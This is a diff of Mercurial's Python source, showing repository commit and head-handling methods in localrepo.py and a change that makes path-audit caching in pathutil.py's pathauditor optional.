1891 """
1892 """
1892
1893
1893 tr = None
1894 tr = None
1894 p1, p2 = ctx.p1(), ctx.p2()
1895 p1, p2 = ctx.p1(), ctx.p2()
1895 user = ctx.user()
1896 user = ctx.user()
1896
1897
1897 lock = self.lock()
1898 lock = self.lock()
1898 try:
1899 try:
1899 tr = self.transaction("commit")
1900 tr = self.transaction("commit")
1900 trp = weakref.proxy(tr)
1901 trp = weakref.proxy(tr)
1901
1902
1902 if ctx.manifestnode():
1903 if ctx.manifestnode():
1903 # reuse an existing manifest revision
1904 # reuse an existing manifest revision
1904 mn = ctx.manifestnode()
1905 mn = ctx.manifestnode()
1905 files = ctx.files()
1906 files = ctx.files()
1906 elif ctx.files():
1907 elif ctx.files():
1907 m1ctx = p1.manifestctx()
1908 m1ctx = p1.manifestctx()
1908 m2ctx = p2.manifestctx()
1909 m2ctx = p2.manifestctx()
1909 mctx = m1ctx.copy()
1910 mctx = m1ctx.copy()
1910
1911
1911 m = mctx.read()
1912 m = mctx.read()
1912 m1 = m1ctx.read()
1913 m1 = m1ctx.read()
1913 m2 = m2ctx.read()
1914 m2 = m2ctx.read()
1914
1915
1915 # check in files
1916 # check in files
1916 added = []
1917 added = []
1917 changed = []
1918 changed = []
1918 removed = list(ctx.removed())
1919 removed = list(ctx.removed())
1919 linkrev = len(self)
1920 linkrev = len(self)
1920 self.ui.note(_("committing files:\n"))
1921 self.ui.note(_("committing files:\n"))
1921 for f in sorted(ctx.modified() + ctx.added()):
1922 for f in sorted(ctx.modified() + ctx.added()):
1922 self.ui.note(f + "\n")
1923 self.ui.note(f + "\n")
1923 try:
1924 try:
1924 fctx = ctx[f]
1925 fctx = ctx[f]
1925 if fctx is None:
1926 if fctx is None:
1926 removed.append(f)
1927 removed.append(f)
1927 else:
1928 else:
1928 added.append(f)
1929 added.append(f)
1929 m[f] = self._filecommit(fctx, m1, m2, linkrev,
1930 m[f] = self._filecommit(fctx, m1, m2, linkrev,
1930 trp, changed)
1931 trp, changed)
1931 m.setflag(f, fctx.flags())
1932 m.setflag(f, fctx.flags())
1932 except OSError as inst:
1933 except OSError as inst:
1933 self.ui.warn(_("trouble committing %s!\n") % f)
1934 self.ui.warn(_("trouble committing %s!\n") % f)
1934 raise
1935 raise
1935 except IOError as inst:
1936 except IOError as inst:
1936 errcode = getattr(inst, 'errno', errno.ENOENT)
1937 errcode = getattr(inst, 'errno', errno.ENOENT)
1937 if error or errcode and errcode != errno.ENOENT:
1938 if error or errcode and errcode != errno.ENOENT:
1938 self.ui.warn(_("trouble committing %s!\n") % f)
1939 self.ui.warn(_("trouble committing %s!\n") % f)
1939 raise
1940 raise
1940
1941
1941 # update manifest
1942 # update manifest
1942 self.ui.note(_("committing manifest\n"))
1943 self.ui.note(_("committing manifest\n"))
1943 removed = [f for f in sorted(removed) if f in m1 or f in m2]
1944 removed = [f for f in sorted(removed) if f in m1 or f in m2]
1944 drop = [f for f in removed if f in m]
1945 drop = [f for f in removed if f in m]
1945 for f in drop:
1946 for f in drop:
1946 del m[f]
1947 del m[f]
1947 mn = mctx.write(trp, linkrev,
1948 mn = mctx.write(trp, linkrev,
1948 p1.manifestnode(), p2.manifestnode(),
1949 p1.manifestnode(), p2.manifestnode(),
1949 added, drop)
1950 added, drop)
1950 files = changed + removed
1951 files = changed + removed
1951 else:
1952 else:
1952 mn = p1.manifestnode()
1953 mn = p1.manifestnode()
1953 files = []
1954 files = []
1954
1955
1955 # update changelog
1956 # update changelog
1956 self.ui.note(_("committing changelog\n"))
1957 self.ui.note(_("committing changelog\n"))
1957 self.changelog.delayupdate(tr)
1958 self.changelog.delayupdate(tr)
1958 n = self.changelog.add(mn, files, ctx.description(),
1959 n = self.changelog.add(mn, files, ctx.description(),
1959 trp, p1.node(), p2.node(),
1960 trp, p1.node(), p2.node(),
1960 user, ctx.date(), ctx.extra().copy())
1961 user, ctx.date(), ctx.extra().copy())
1961 xp1, xp2 = p1.hex(), p2 and p2.hex() or ''
1962 xp1, xp2 = p1.hex(), p2 and p2.hex() or ''
1962 self.hook('pretxncommit', throw=True, node=hex(n), parent1=xp1,
1963 self.hook('pretxncommit', throw=True, node=hex(n), parent1=xp1,
1963 parent2=xp2)
1964 parent2=xp2)
1964 # set the new commit is proper phase
1965 # set the new commit is proper phase
1965 targetphase = subrepo.newcommitphase(self.ui, ctx)
1966 targetphase = subrepo.newcommitphase(self.ui, ctx)
1966 if targetphase:
1967 if targetphase:
1967 # retract boundary do not alter parent changeset.
1968 # retract boundary do not alter parent changeset.
1968 # if a parent have higher the resulting phase will
1969 # if a parent have higher the resulting phase will
1969 # be compliant anyway
1970 # be compliant anyway
1970 #
1971 #
1971 # if minimal phase was 0 we don't need to retract anything
1972 # if minimal phase was 0 we don't need to retract anything
1972 phases.registernew(self, tr, targetphase, [n])
1973 phases.registernew(self, tr, targetphase, [n])
1973 tr.close()
1974 tr.close()
1974 return n
1975 return n
1975 finally:
1976 finally:
1976 if tr:
1977 if tr:
1977 tr.release()
1978 tr.release()
1978 lock.release()
1979 lock.release()
1979
1980
1980 @unfilteredmethod
1981 @unfilteredmethod
1981 def destroying(self):
1982 def destroying(self):
1982 '''Inform the repository that nodes are about to be destroyed.
1983 '''Inform the repository that nodes are about to be destroyed.
1983 Intended for use by strip and rollback, so there's a common
1984 Intended for use by strip and rollback, so there's a common
1984 place for anything that has to be done before destroying history.
1985 place for anything that has to be done before destroying history.
1985
1986
1986 This is mostly useful for saving state that is in memory and waiting
1987 This is mostly useful for saving state that is in memory and waiting
1987 to be flushed when the current lock is released. Because a call to
1988 to be flushed when the current lock is released. Because a call to
1988 destroyed is imminent, the repo will be invalidated causing those
1989 destroyed is imminent, the repo will be invalidated causing those
1989 changes to stay in memory (waiting for the next unlock), or vanish
1990 changes to stay in memory (waiting for the next unlock), or vanish
1990 completely.
1991 completely.
1991 '''
1992 '''
1992 # When using the same lock to commit and strip, the phasecache is left
1993 # When using the same lock to commit and strip, the phasecache is left
1993 # dirty after committing. Then when we strip, the repo is invalidated,
1994 # dirty after committing. Then when we strip, the repo is invalidated,
1994 # causing those changes to disappear.
1995 # causing those changes to disappear.
1995 if '_phasecache' in vars(self):
1996 if '_phasecache' in vars(self):
1996 self._phasecache.write()
1997 self._phasecache.write()
1997
1998
1998 @unfilteredmethod
1999 @unfilteredmethod
1999 def destroyed(self):
2000 def destroyed(self):
2000 '''Inform the repository that nodes have been destroyed.
2001 '''Inform the repository that nodes have been destroyed.
2001 Intended for use by strip and rollback, so there's a common
2002 Intended for use by strip and rollback, so there's a common
2002 place for anything that has to be done after destroying history.
2003 place for anything that has to be done after destroying history.
2003 '''
2004 '''
2004 # When one tries to:
2005 # When one tries to:
2005 # 1) destroy nodes thus calling this method (e.g. strip)
2006 # 1) destroy nodes thus calling this method (e.g. strip)
2006 # 2) use phasecache somewhere (e.g. commit)
2007 # 2) use phasecache somewhere (e.g. commit)
2007 #
2008 #
2008 # then 2) will fail because the phasecache contains nodes that were
2009 # then 2) will fail because the phasecache contains nodes that were
2009 # removed. We can either remove phasecache from the filecache,
2010 # removed. We can either remove phasecache from the filecache,
2010 # causing it to reload next time it is accessed, or simply filter
2011 # causing it to reload next time it is accessed, or simply filter
2011 # the removed nodes now and write the updated cache.
2012 # the removed nodes now and write the updated cache.
2012 self._phasecache.filterunknown(self)
2013 self._phasecache.filterunknown(self)
2013 self._phasecache.write()
2014 self._phasecache.write()
2014
2015
2015 # refresh all repository caches
2016 # refresh all repository caches
2016 self.updatecaches()
2017 self.updatecaches()
2017
2018
2018 # Ensure the persistent tag cache is updated. Doing it now
2019 # Ensure the persistent tag cache is updated. Doing it now
2019 # means that the tag cache only has to worry about destroyed
2020 # means that the tag cache only has to worry about destroyed
2020 # heads immediately after a strip/rollback. That in turn
2021 # heads immediately after a strip/rollback. That in turn
2021 # guarantees that "cachetip == currenttip" (comparing both rev
2022 # guarantees that "cachetip == currenttip" (comparing both rev
2022 # and node) always means no nodes have been added or destroyed.
2023 # and node) always means no nodes have been added or destroyed.
2023
2024
2024 # XXX this is suboptimal when qrefresh'ing: we strip the current
2025 # XXX this is suboptimal when qrefresh'ing: we strip the current
2025 # head, refresh the tag cache, then immediately add a new head.
2026 # head, refresh the tag cache, then immediately add a new head.
2026 # But I think doing it this way is necessary for the "instant
2027 # But I think doing it this way is necessary for the "instant
2027 # tag cache retrieval" case to work.
2028 # tag cache retrieval" case to work.
2028 self.invalidate()
2029 self.invalidate()
2029
2030
2030 def walk(self, match, node=None):
2031 def walk(self, match, node=None):
2031 '''
2032 '''
2032 walk recursively through the directory tree or a given
2033 walk recursively through the directory tree or a given
2033 changeset, finding all files matched by the match
2034 changeset, finding all files matched by the match
2034 function
2035 function
2035 '''
2036 '''
2036 self.ui.deprecwarn('use repo[node].walk instead of repo.walk', '4.3')
2037 self.ui.deprecwarn('use repo[node].walk instead of repo.walk', '4.3')
2037 return self[node].walk(match)
2038 return self[node].walk(match)
2038
2039
2039 def status(self, node1='.', node2=None, match=None,
2040 def status(self, node1='.', node2=None, match=None,
2040 ignored=False, clean=False, unknown=False,
2041 ignored=False, clean=False, unknown=False,
2041 listsubrepos=False):
2042 listsubrepos=False):
2042 '''a convenience method that calls node1.status(node2)'''
2043 '''a convenience method that calls node1.status(node2)'''
2043 return self[node1].status(node2, match, ignored, clean, unknown,
2044 return self[node1].status(node2, match, ignored, clean, unknown,
2044 listsubrepos)
2045 listsubrepos)
2045
2046
2046 def addpostdsstatus(self, ps):
2047 def addpostdsstatus(self, ps):
2047 """Add a callback to run within the wlock, at the point at which status
2048 """Add a callback to run within the wlock, at the point at which status
2048 fixups happen.
2049 fixups happen.
2049
2050
2050 On status completion, callback(wctx, status) will be called with the
2051 On status completion, callback(wctx, status) will be called with the
2051 wlock held, unless the dirstate has changed from underneath or the wlock
2052 wlock held, unless the dirstate has changed from underneath or the wlock
2052 couldn't be grabbed.
2053 couldn't be grabbed.
2053
2054
2054 Callbacks should not capture and use a cached copy of the dirstate --
2055 Callbacks should not capture and use a cached copy of the dirstate --
2055 it might change in the meanwhile. Instead, they should access the
2056 it might change in the meanwhile. Instead, they should access the
2056 dirstate via wctx.repo().dirstate.
2057 dirstate via wctx.repo().dirstate.
2057
2058
2058 This list is emptied out after each status run -- extensions should
2059 This list is emptied out after each status run -- extensions should
2059 make sure it adds to this list each time dirstate.status is called.
2060 make sure it adds to this list each time dirstate.status is called.
2060 Extensions should also make sure they don't call this for statuses
2061 Extensions should also make sure they don't call this for statuses
2061 that don't involve the dirstate.
2062 that don't involve the dirstate.
2062 """
2063 """
2063
2064
2064 # The list is located here for uniqueness reasons -- it is actually
2065 # The list is located here for uniqueness reasons -- it is actually
2065 # managed by the workingctx, but that isn't unique per-repo.
2066 # managed by the workingctx, but that isn't unique per-repo.
2066 self._postdsstatus.append(ps)
2067 self._postdsstatus.append(ps)
2067
2068
2068 def postdsstatus(self):
2069 def postdsstatus(self):
2069 """Used by workingctx to get the list of post-dirstate-status hooks."""
2070 """Used by workingctx to get the list of post-dirstate-status hooks."""
2070 return self._postdsstatus
2071 return self._postdsstatus
2071
2072
2072 def clearpostdsstatus(self):
2073 def clearpostdsstatus(self):
2073 """Used by workingctx to clear post-dirstate-status hooks."""
2074 """Used by workingctx to clear post-dirstate-status hooks."""
2074 del self._postdsstatus[:]
2075 del self._postdsstatus[:]
2075
2076
2076 def heads(self, start=None):
2077 def heads(self, start=None):
2077 if start is None:
2078 if start is None:
2078 cl = self.changelog
2079 cl = self.changelog
2079 headrevs = reversed(cl.headrevs())
2080 headrevs = reversed(cl.headrevs())
2080 return [cl.node(rev) for rev in headrevs]
2081 return [cl.node(rev) for rev in headrevs]
2081
2082
2082 heads = self.changelog.heads(start)
2083 heads = self.changelog.heads(start)
2083 # sort the output in rev descending order
2084 # sort the output in rev descending order
2084 return sorted(heads, key=self.changelog.rev, reverse=True)
2085 return sorted(heads, key=self.changelog.rev, reverse=True)
2085
2086
2086 def branchheads(self, branch=None, start=None, closed=False):
2087 def branchheads(self, branch=None, start=None, closed=False):
2087 '''return a (possibly filtered) list of heads for the given branch
2088 '''return a (possibly filtered) list of heads for the given branch
2088
2089
2089 Heads are returned in topological order, from newest to oldest.
2090 Heads are returned in topological order, from newest to oldest.
2090 If branch is None, use the dirstate branch.
2091 If branch is None, use the dirstate branch.
2091 If start is not None, return only heads reachable from start.
2092 If start is not None, return only heads reachable from start.
2092 If closed is True, return heads that are marked as closed as well.
2093 If closed is True, return heads that are marked as closed as well.
2093 '''
2094 '''
2094 if branch is None:
2095 if branch is None:
2095 branch = self[None].branch()
2096 branch = self[None].branch()
2096 branches = self.branchmap()
2097 branches = self.branchmap()
2097 if branch not in branches:
2098 if branch not in branches:
2098 return []
2099 return []
2099 # the cache returns heads ordered lowest to highest
2100 # the cache returns heads ordered lowest to highest
2100 bheads = list(reversed(branches.branchheads(branch, closed=closed)))
2101 bheads = list(reversed(branches.branchheads(branch, closed=closed)))
2101 if start is not None:
2102 if start is not None:
2102 # filter out the heads that cannot be reached from startrev
2103 # filter out the heads that cannot be reached from startrev
2103 fbheads = set(self.changelog.nodesbetween([start], bheads)[2])
2104 fbheads = set(self.changelog.nodesbetween([start], bheads)[2])
2104 bheads = [h for h in bheads if h in fbheads]
2105 bheads = [h for h in bheads if h in fbheads]
2105 return bheads
2106 return bheads
2106
2107
2107 def branches(self, nodes):
2108 def branches(self, nodes):
2108 if not nodes:
2109 if not nodes:
2109 nodes = [self.changelog.tip()]
2110 nodes = [self.changelog.tip()]
2110 b = []
2111 b = []
2111 for n in nodes:
2112 for n in nodes:
2112 t = n
2113 t = n
2113 while True:
2114 while True:
2114 p = self.changelog.parents(n)
2115 p = self.changelog.parents(n)
2115 if p[1] != nullid or p[0] == nullid:
2116 if p[1] != nullid or p[0] == nullid:
2116 b.append((t, n, p[0], p[1]))
2117 b.append((t, n, p[0], p[1]))
2117 break
2118 break
2118 n = p[0]
2119 n = p[0]
2119 return b
2120 return b
2120
2121
2121 def between(self, pairs):
2122 def between(self, pairs):
2122 r = []
2123 r = []
2123
2124
2124 for top, bottom in pairs:
2125 for top, bottom in pairs:
2125 n, l, i = top, [], 0
2126 n, l, i = top, [], 0
2126 f = 1
2127 f = 1
2127
2128
2128 while n != bottom and n != nullid:
2129 while n != bottom and n != nullid:
2129 p = self.changelog.parents(n)[0]
2130 p = self.changelog.parents(n)[0]
2130 if i == f:
2131 if i == f:
2131 l.append(n)
2132 l.append(n)
2132 f = f * 2
2133 f = f * 2
2133 n = p
2134 n = p
2134 i += 1
2135 i += 1
2135
2136
2136 r.append(l)
2137 r.append(l)
2137
2138
2138 return r
2139 return r
2139
2140
2140 def checkpush(self, pushop):
2141 def checkpush(self, pushop):
2141 """Extensions can override this function if additional checks have
2142 """Extensions can override this function if additional checks have
2142 to be performed before pushing, or call it if they override push
2143 to be performed before pushing, or call it if they override push
2143 command.
2144 command.
2144 """
2145 """
2145 pass
2146 pass
2146
2147
2147 @unfilteredpropertycache
2148 @unfilteredpropertycache
2148 def prepushoutgoinghooks(self):
2149 def prepushoutgoinghooks(self):
2149 """Return util.hooks consists of a pushop with repo, remote, outgoing
2150 """Return util.hooks consists of a pushop with repo, remote, outgoing
2150 methods, which are called before pushing changesets.
2151 methods, which are called before pushing changesets.
2151 """
2152 """
2152 return util.hooks()
2153 return util.hooks()
2153
2154
2154 def pushkey(self, namespace, key, old, new):
2155 def pushkey(self, namespace, key, old, new):
2155 try:
2156 try:
2156 tr = self.currenttransaction()
2157 tr = self.currenttransaction()
2157 hookargs = {}
2158 hookargs = {}
2158 if tr is not None:
2159 if tr is not None:
2159 hookargs.update(tr.hookargs)
2160 hookargs.update(tr.hookargs)
2160 hookargs['namespace'] = namespace
2161 hookargs['namespace'] = namespace
2161 hookargs['key'] = key
2162 hookargs['key'] = key
2162 hookargs['old'] = old
2163 hookargs['old'] = old
2163 hookargs['new'] = new
2164 hookargs['new'] = new
2164 self.hook('prepushkey', throw=True, **hookargs)
2165 self.hook('prepushkey', throw=True, **hookargs)
2165 except error.HookAbort as exc:
2166 except error.HookAbort as exc:
2166 self.ui.write_err(_("pushkey-abort: %s\n") % exc)
2167 self.ui.write_err(_("pushkey-abort: %s\n") % exc)
2167 if exc.hint:
2168 if exc.hint:
2168 self.ui.write_err(_("(%s)\n") % exc.hint)
2169 self.ui.write_err(_("(%s)\n") % exc.hint)
2169 return False
2170 return False
2170 self.ui.debug('pushing key for "%s:%s"\n' % (namespace, key))
2171 self.ui.debug('pushing key for "%s:%s"\n' % (namespace, key))
2171 ret = pushkey.push(self, namespace, key, old, new)
2172 ret = pushkey.push(self, namespace, key, old, new)
2172 def runhook():
2173 def runhook():
2173 self.hook('pushkey', namespace=namespace, key=key, old=old, new=new,
2174 self.hook('pushkey', namespace=namespace, key=key, old=old, new=new,
2174 ret=ret)
2175 ret=ret)
2175 self._afterlock(runhook)
2176 self._afterlock(runhook)
2176 return ret
2177 return ret
2177
2178
2178 def listkeys(self, namespace):
2179 def listkeys(self, namespace):
2179 self.hook('prelistkeys', throw=True, namespace=namespace)
2180 self.hook('prelistkeys', throw=True, namespace=namespace)
2180 self.ui.debug('listing keys for "%s"\n' % namespace)
2181 self.ui.debug('listing keys for "%s"\n' % namespace)
2181 values = pushkey.list(self, namespace)
2182 values = pushkey.list(self, namespace)
2182 self.hook('listkeys', namespace=namespace, values=values)
2183 self.hook('listkeys', namespace=namespace, values=values)
2183 return values
2184 return values
2184
2185
2185 def debugwireargs(self, one, two, three=None, four=None, five=None):
2186 def debugwireargs(self, one, two, three=None, four=None, five=None):
2186 '''used to test argument passing over the wire'''
2187 '''used to test argument passing over the wire'''
2187 return "%s %s %s %s %s" % (one, two, three, four, five)
2188 return "%s %s %s %s %s" % (one, two, three, four, five)
2188
2189
2189 def savecommitmessage(self, text):
2190 def savecommitmessage(self, text):
2190 fp = self.vfs('last-message.txt', 'wb')
2191 fp = self.vfs('last-message.txt', 'wb')
2191 try:
2192 try:
2192 fp.write(text)
2193 fp.write(text)
2193 finally:
2194 finally:
2194 fp.close()
2195 fp.close()
2195 return self.pathto(fp.name[len(self.root) + 1:])
2196 return self.pathto(fp.name[len(self.root) + 1:])
2196
2197
2197 # used to avoid circular references so destructors work
2198 # used to avoid circular references so destructors work
2198 def aftertrans(files):
2199 def aftertrans(files):
2199 renamefiles = [tuple(t) for t in files]
2200 renamefiles = [tuple(t) for t in files]
2200 def a():
2201 def a():
2201 for vfs, src, dest in renamefiles:
2202 for vfs, src, dest in renamefiles:
2202 # if src and dest refer to a same file, vfs.rename is a no-op,
2203 # if src and dest refer to a same file, vfs.rename is a no-op,
2203 # leaving both src and dest on disk. delete dest to make sure
2204 # leaving both src and dest on disk. delete dest to make sure
2204 # the rename couldn't be such a no-op.
2205 # the rename couldn't be such a no-op.
2205 vfs.tryunlink(dest)
2206 vfs.tryunlink(dest)
2206 try:
2207 try:
2207 vfs.rename(src, dest)
2208 vfs.rename(src, dest)
2208 except OSError: # journal file does not yet exist
2209 except OSError: # journal file does not yet exist
2209 pass
2210 pass
2210 return a
2211 return a
2211
2212
2212 def undoname(fn):
2213 def undoname(fn):
2213 base, name = os.path.split(fn)
2214 base, name = os.path.split(fn)
2214 assert name.startswith('journal')
2215 assert name.startswith('journal')
2215 return os.path.join(base, name.replace('journal', 'undo', 1))
2216 return os.path.join(base, name.replace('journal', 'undo', 1))
2216
2217
2217 def instance(ui, path, create):
2218 def instance(ui, path, create):
2218 return localrepository(ui, util.urllocalpath(path), create)
2219 return localrepository(ui, util.urllocalpath(path), create)
2219
2220
2220 def islocal(path):
2221 def islocal(path):
2221 return True
2222 return True
2222
2223
2223 def newreporequirements(repo):
2224 def newreporequirements(repo):
2224 """Determine the set of requirements for a new local repository.
2225 """Determine the set of requirements for a new local repository.
2225
2226
2226 Extensions can wrap this function to specify custom requirements for
2227 Extensions can wrap this function to specify custom requirements for
2227 new repositories.
2228 new repositories.
2228 """
2229 """
2229 ui = repo.ui
2230 ui = repo.ui
2230 requirements = {'revlogv1'}
2231 requirements = {'revlogv1'}
2231 if ui.configbool('format', 'usestore'):
2232 if ui.configbool('format', 'usestore'):
2232 requirements.add('store')
2233 requirements.add('store')
2233 if ui.configbool('format', 'usefncache'):
2234 if ui.configbool('format', 'usefncache'):
2234 requirements.add('fncache')
2235 requirements.add('fncache')
2235 if ui.configbool('format', 'dotencode'):
2236 if ui.configbool('format', 'dotencode'):
2236 requirements.add('dotencode')
2237 requirements.add('dotencode')
2237
2238
2238 compengine = ui.config('experimental', 'format.compression')
2239 compengine = ui.config('experimental', 'format.compression')
2239 if compengine not in util.compengines:
2240 if compengine not in util.compengines:
2240 raise error.Abort(_('compression engine %s defined by '
2241 raise error.Abort(_('compression engine %s defined by '
2241 'experimental.format.compression not available') %
2242 'experimental.format.compression not available') %
2242 compengine,
2243 compengine,
2243 hint=_('run "hg debuginstall" to list available '
2244 hint=_('run "hg debuginstall" to list available '
2244 'compression engines'))
2245 'compression engines'))
2245
2246
2246 # zlib is the historical default and doesn't need an explicit requirement.
2247 # zlib is the historical default and doesn't need an explicit requirement.
2247 if compengine != 'zlib':
2248 if compengine != 'zlib':
2248 requirements.add('exp-compression-%s' % compengine)
2249 requirements.add('exp-compression-%s' % compengine)
2249
2250
2250 if scmutil.gdinitconfig(ui):
2251 if scmutil.gdinitconfig(ui):
2251 requirements.add('generaldelta')
2252 requirements.add('generaldelta')
2252 if ui.configbool('experimental', 'treemanifest'):
2253 if ui.configbool('experimental', 'treemanifest'):
2253 requirements.add('treemanifest')
2254 requirements.add('treemanifest')
2254 if ui.configbool('experimental', 'manifestv2'):
2255 if ui.configbool('experimental', 'manifestv2'):
2255 requirements.add('manifestv2')
2256 requirements.add('manifestv2')
2256
2257
2257 revlogv2 = ui.config('experimental', 'revlogv2')
2258 revlogv2 = ui.config('experimental', 'revlogv2')
2258 if revlogv2 == 'enable-unstable-format-and-corrupt-my-data':
2259 if revlogv2 == 'enable-unstable-format-and-corrupt-my-data':
2259 requirements.remove('revlogv1')
2260 requirements.remove('revlogv1')
2260 # generaldelta is implied by revlogv2.
2261 # generaldelta is implied by revlogv2.
2261 requirements.discard('generaldelta')
2262 requirements.discard('generaldelta')
2262 requirements.add(REVLOGV2_REQUIREMENT)
2263 requirements.add(REVLOGV2_REQUIREMENT)
2263
2264
2264 return requirements
2265 return requirements
@@ -1,215 +1,221 b''
1 from __future__ import absolute_import
1 from __future__ import absolute_import
2
2
3 import errno
3 import errno
4 import os
4 import os
5 import posixpath
5 import posixpath
6 import stat
6 import stat
7
7
8 from .i18n import _
8 from .i18n import _
9 from . import (
9 from . import (
10 encoding,
10 encoding,
11 error,
11 error,
12 pycompat,
12 pycompat,
13 util,
13 util,
14 )
14 )
15
15
16 def _lowerclean(s):
16 def _lowerclean(s):
17 return encoding.hfsignoreclean(s.lower())
17 return encoding.hfsignoreclean(s.lower())
18
18
19 class pathauditor(object):
19 class pathauditor(object):
20 '''ensure that a filesystem path contains no banned components.
20 '''ensure that a filesystem path contains no banned components.
21 the following properties of a path are checked:
21 the following properties of a path are checked:
22
22
23 - ends with a directory separator
23 - ends with a directory separator
24 - under top-level .hg
24 - under top-level .hg
25 - starts at the root of a windows drive
25 - starts at the root of a windows drive
26 - contains ".."
26 - contains ".."
27
27
28 More check are also done about the file system states:
28 More check are also done about the file system states:
29 - traverses a symlink (e.g. a/symlink_here/b)
29 - traverses a symlink (e.g. a/symlink_here/b)
30 - inside a nested repository (a callback can be used to approve
30 - inside a nested repository (a callback can be used to approve
31 some nested repositories, e.g., subrepositories)
31 some nested repositories, e.g., subrepositories)
32
32
33 The file system checks are only done when 'realfs' is set to True (the
33 The file system checks are only done when 'realfs' is set to True (the
34 default). They should be disable then we are auditing path for operation on
34 default). They should be disable then we are auditing path for operation on
35 stored history.
35 stored history.
36
37 If 'cached' is set to True, audited paths and sub-directories are cached.
38 Be careful to not keep the cache of unmanaged directories for long because
39 audited paths may be replaced with symlinks.
36 '''
40 '''
37
41
38 def __init__(self, root, callback=None, realfs=True):
42 def __init__(self, root, callback=None, realfs=True, cached=False):
39 self.audited = set()
43 self.audited = set()
40 self.auditeddir = set()
44 self.auditeddir = set()
41 self.root = root
45 self.root = root
42 self._realfs = realfs
46 self._realfs = realfs
47 self._cached = cached
43 self.callback = callback
48 self.callback = callback
44 if os.path.lexists(root) and not util.fscasesensitive(root):
49 if os.path.lexists(root) and not util.fscasesensitive(root):
45 self.normcase = util.normcase
50 self.normcase = util.normcase
46 else:
51 else:
47 self.normcase = lambda x: x
52 self.normcase = lambda x: x
48
53
49 def __call__(self, path, mode=None):
54 def __call__(self, path, mode=None):
50 '''Check the relative path.
55 '''Check the relative path.
51 path may contain a pattern (e.g. foodir/**.txt)'''
56 path may contain a pattern (e.g. foodir/**.txt)'''
52
57
53 path = util.localpath(path)
58 path = util.localpath(path)
54 normpath = self.normcase(path)
59 normpath = self.normcase(path)
55 if normpath in self.audited:
60 if normpath in self.audited:
56 return
61 return
57 # AIX ignores "/" at end of path, others raise EISDIR.
62 # AIX ignores "/" at end of path, others raise EISDIR.
58 if util.endswithsep(path):
63 if util.endswithsep(path):
59 raise error.Abort(_("path ends in directory separator: %s") % path)
64 raise error.Abort(_("path ends in directory separator: %s") % path)
60 parts = util.splitpath(path)
65 parts = util.splitpath(path)
61 if (os.path.splitdrive(path)[0]
66 if (os.path.splitdrive(path)[0]
62 or _lowerclean(parts[0]) in ('.hg', '.hg.', '')
67 or _lowerclean(parts[0]) in ('.hg', '.hg.', '')
63 or os.pardir in parts):
68 or os.pardir in parts):
64 raise error.Abort(_("path contains illegal component: %s") % path)
69 raise error.Abort(_("path contains illegal component: %s") % path)
65 # Windows shortname aliases
70 # Windows shortname aliases
66 for p in parts:
71 for p in parts:
67 if "~" in p:
72 if "~" in p:
68 first, last = p.split("~", 1)
73 first, last = p.split("~", 1)
69 if last.isdigit() and first.upper() in ["HG", "HG8B6C"]:
74 if last.isdigit() and first.upper() in ["HG", "HG8B6C"]:
70 raise error.Abort(_("path contains illegal component: %s")
75 raise error.Abort(_("path contains illegal component: %s")
71 % path)
76 % path)
72 if '.hg' in _lowerclean(path):
77 if '.hg' in _lowerclean(path):
73 lparts = [_lowerclean(p.lower()) for p in parts]
78 lparts = [_lowerclean(p.lower()) for p in parts]
74 for p in '.hg', '.hg.':
79 for p in '.hg', '.hg.':
75 if p in lparts[1:]:
80 if p in lparts[1:]:
76 pos = lparts.index(p)
81 pos = lparts.index(p)
77 base = os.path.join(*parts[:pos])
82 base = os.path.join(*parts[:pos])
78 raise error.Abort(_("path '%s' is inside nested repo %r")
83 raise error.Abort(_("path '%s' is inside nested repo %r")
79 % (path, base))
84 % (path, base))
80
85
81 normparts = util.splitpath(normpath)
86 normparts = util.splitpath(normpath)
82 assert len(parts) == len(normparts)
87 assert len(parts) == len(normparts)
83
88
84 parts.pop()
89 parts.pop()
85 normparts.pop()
90 normparts.pop()
86 prefixes = []
91 prefixes = []
87 # It's important that we check the path parts starting from the root.
92 # It's important that we check the path parts starting from the root.
88 # This means we won't accidentally traverse a symlink into some other
93 # This means we won't accidentally traverse a symlink into some other
89 # filesystem (which is potentially expensive to access).
94 # filesystem (which is potentially expensive to access).
90 for i in range(len(parts)):
95 for i in range(len(parts)):
91 prefix = pycompat.ossep.join(parts[:i + 1])
96 prefix = pycompat.ossep.join(parts[:i + 1])
92 normprefix = pycompat.ossep.join(normparts[:i + 1])
97 normprefix = pycompat.ossep.join(normparts[:i + 1])
93 if normprefix in self.auditeddir:
98 if normprefix in self.auditeddir:
94 continue
99 continue
95 if self._realfs:
100 if self._realfs:
96 self._checkfs(prefix, path)
101 self._checkfs(prefix, path)
97 prefixes.append(normprefix)
102 prefixes.append(normprefix)
98
103
99 self.audited.add(normpath)
104 if self._cached:
100 # only add prefixes to the cache after checking everything: we don't
105 self.audited.add(normpath)
101 # want to add "foo/bar/baz" before checking if there's a "foo/.hg"
106 # only add prefixes to the cache after checking everything: we don't
102 self.auditeddir.update(prefixes)
107 # want to add "foo/bar/baz" before checking if there's a "foo/.hg"
108 self.auditeddir.update(prefixes)
103
109
104 def _checkfs(self, prefix, path):
110 def _checkfs(self, prefix, path):
105 """raise exception if a file system backed check fails"""
111 """raise exception if a file system backed check fails"""
106 curpath = os.path.join(self.root, prefix)
112 curpath = os.path.join(self.root, prefix)
107 try:
113 try:
108 st = os.lstat(curpath)
114 st = os.lstat(curpath)
109 except OSError as err:
115 except OSError as err:
110 # EINVAL can be raised as invalid path syntax under win32.
116 # EINVAL can be raised as invalid path syntax under win32.
111 # They must be ignored for patterns can be checked too.
117 # They must be ignored for patterns can be checked too.
112 if err.errno not in (errno.ENOENT, errno.ENOTDIR, errno.EINVAL):
118 if err.errno not in (errno.ENOENT, errno.ENOTDIR, errno.EINVAL):
113 raise
119 raise
114 else:
120 else:
115 if stat.S_ISLNK(st.st_mode):
121 if stat.S_ISLNK(st.st_mode):
116 msg = _('path %r traverses symbolic link %r') % (path, prefix)
122 msg = _('path %r traverses symbolic link %r') % (path, prefix)
117 raise error.Abort(msg)
123 raise error.Abort(msg)
118 elif (stat.S_ISDIR(st.st_mode) and
124 elif (stat.S_ISDIR(st.st_mode) and
119 os.path.isdir(os.path.join(curpath, '.hg'))):
125 os.path.isdir(os.path.join(curpath, '.hg'))):
120 if not self.callback or not self.callback(curpath):
126 if not self.callback or not self.callback(curpath):
121 msg = _("path '%s' is inside nested repo %r")
127 msg = _("path '%s' is inside nested repo %r")
122 raise error.Abort(msg % (path, prefix))
128 raise error.Abort(msg % (path, prefix))
123
129
124 def check(self, path):
130 def check(self, path):
125 try:
131 try:
126 self(path)
132 self(path)
127 return True
133 return True
